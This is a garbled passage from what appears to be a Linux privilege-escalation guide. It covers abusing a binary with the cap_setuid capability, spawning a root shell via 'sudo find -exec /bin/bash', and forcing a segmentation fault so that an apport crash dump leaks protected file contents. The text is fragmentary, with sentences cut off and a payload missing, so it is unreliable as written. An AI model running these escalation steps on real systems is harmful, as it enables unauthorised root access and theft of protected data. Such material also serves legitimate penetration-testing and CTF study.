getcap
command. For example, if you execute:/usr/bin/python3.8 = cap_setuid,cap_net_bind_service+eip
, you are then able to abuse setuid
, as follows:find
, you may be able to use it to execute commands as root:sudo find . -exec /bin/bash /;
prctl(PR_SET_DUMPABLE, 1)
or hinted at by a valgrind file). ctrl + Z
, use PS
to locate the executables' PID, and then send SIGSEGV to cause a segmentation fault (kill -SIGSEGV [PID]
). Finally, execute fg
to resume (and crash) the file, resulting in a crash file appearing (/var/crash/_path_to_executable.uid.crash).
apport-unpack /tmp/_path_to_executable.uid.crash /tmp/mycrash
. Switch to the /tmp/mycrash
directory.strings CoreDump
. Hopefully, the file content you are looking for will appear.